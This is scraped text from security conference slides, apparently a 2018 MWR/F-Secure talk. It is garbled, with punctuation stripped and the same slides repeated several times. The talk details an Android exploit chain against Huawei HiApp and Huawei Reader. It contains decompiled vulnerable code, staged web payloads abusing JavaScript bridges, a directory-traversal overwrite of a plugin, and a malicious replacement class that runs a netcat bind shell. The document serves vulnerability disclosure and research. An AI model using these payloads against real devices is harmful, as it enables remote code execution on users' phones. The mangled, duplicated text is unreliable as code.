if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 22: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/22.jpg)
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 23: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/23.jpg)
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 24: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/24.jpg)
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
